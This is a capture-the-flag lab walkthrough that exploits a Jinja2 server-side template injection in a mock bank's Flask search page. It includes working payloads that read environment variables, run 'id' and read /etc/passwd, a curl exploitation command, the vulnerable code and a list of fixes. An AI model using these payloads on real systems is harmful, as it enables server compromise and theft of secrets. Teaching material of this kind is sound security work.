Labs / Template Injector
- Daily Challenge
- Released 29 Aug 2025
🔥 Their search function processes templates in real-time - what could go wrong?
SecureBank's advanced search feature boasts dynamic template processing for personalized results. But when user input meets template engines without proper sanitization, the server might just execute more than they bargained for. 🚀 Time to turn their templates against them!
Start Lab Environment
🔍 Template Injector - Complete Server-Side Template Injection Solution
🔍 Step 1: Understanding Server-Side Template Injection
Server-Side Template Injection occurs when user input is embedded into template engines without proper sanitization. In Flask applications using Jinja2, this can lead to remote code execution through Python object introspection and access to system functions.
🔍 Step 2: Initial Reconnaissance
Navigate to <target-ip> to access the SecureBank customer portal. Explore the application and discover the search functionality at <target-ip>/search. The search feature mentions "advanced template processing for personalized results" - a strong indicator of potential SSTI vulnerability.
🔍 Step 3: SSTI Detection and Testing
Test the search functionality for template injection vulnerabilities using mathematical expressions:
Basic Detection
# Test basic math injection
Search query: {{7*7}}
Expected result: 49
# URL encoded version:
%7B%7B7*7%7D%7DTemplate Syntax Testing
# Test Jinja2 syntax
{{7*'7'}}
Expected: 7777777
# Test object access
{{''.__class__}}Error-Based Detection
# Trigger template errors
{{undefined_variable}}
# Invalid syntax
{{7*}}🔍 Step 4: Confirming SSTI Vulnerability
When you search for {{7*7}}, observe that the search results show "Search Results for: 49" instead of "Search Results for: {{7*7}}". This confirms that the template engine is executing the mathematical expression, indicating a successful SSTI vulnerability.
🔍 Step 5: Python Object Introspection
Exploit Python's object model to access system functions through Jinja2 template injection:
# Access base object classes
{{''.__class__.__mro__}}
# List all subclasses
{{''.__class__.__mro__[1].__subclasses__()}}
# Find useful classes (like subprocess.Popen)
{{''.__class__.__mro__[1].__subclasses__()[104]}}🔍 Step 6: Environment Variable Extraction
The flag is stored in the FLAG environment variable. Use Python object introspection to access the os module and extract environment variables:
Method 1: Direct os.environ Access
# Access os module through globals
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ['FLAG'] }}Method 2: Through subprocess
# Find subprocess.Popen class
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ }}🔍 Step 7: Payload Construction and Execution
Construct the final SSTI payload to extract the flag:
Raw Payload:
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ['FLAG'] }}
URL Encoded Payload:
%7B%7B%20%5B%5D.__class__.__base__.__subclasses__%28%29%5B104%5D.__init__.__globals__%5B%27sys%27%5D.modules%5B%27os%27%5D.environ%5B%27FLAG%27%5D%20%7D%7D🔍 Step 8: Exploitation Methods
Using cURL
# Execute SSTI payload
curl "http://<target-ip>/search?q=%7B%7B%20%5B%5D.__class__.__base__.__subclasses__%28%29%5B104%5D.__init__.__globals__%5B%27sys%27%5D.modules%5B%27os%27%5D.environ%5B%27FLAG%27%5D%20%7D%7D"Using Browser
- Navigate to /search
- Enter the SSTI payload in search box
- Submit the search form
- Observe flag in search results
Using Burp Suite
- Intercept search request
- Modify query parameter with SSTI payload
- Forward the request
- Analyze response for flag extraction
🔍 Step 9: Successful Flag Extraction
When the SSTI payload is executed successfully, the search results will display the flag value in the search results. This confirms successful remote code execution and extraction of the flag from the server's environment variables.
🔍 Step 10: Advanced SSTI Techniques
Command Execution
# Execute system commands
{{ [].__class__.__base__.__subclasses__()[104]('id', shell=True, stdout=-1).communicate()[0].strip() }}File System Access
# Read files
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/passwd').read() }}🔍 Step 11: Understanding the Vulnerability
The Flask application contains vulnerable code in the search function:
template = f"""
<div class="search-results">
<h3>Search Results for: {query}</h3>
<p>Found {len(results)} results</p>
</div>
"""
rendered_template = render_template_string(template)The user input query is directly embedded into the template string without sanitization, allowing template injection.
🔍 Step 12: Security Implications
SSTI vulnerabilities can lead to:
- Remote Code Execution: Complete server compromise
- Data Exfiltration: Access to sensitive files and databases
- Environment Disclosure: Exposure of configuration and secrets
- Privilege Escalation: Potential system-level access
- Lateral Movement: Access to internal network resources
🔍 Step 13: Remediation Strategies
To prevent SSTI vulnerabilities:
- Input Sanitization: Never directly embed user input in templates
- Template Sandboxing: Use restricted template environments
- Parameterized Templates: Use template variables instead of string concatenation
- Content Security Policy: Implement CSP headers to limit template execution
- Regular Security Testing: Automated and manual SSTI testing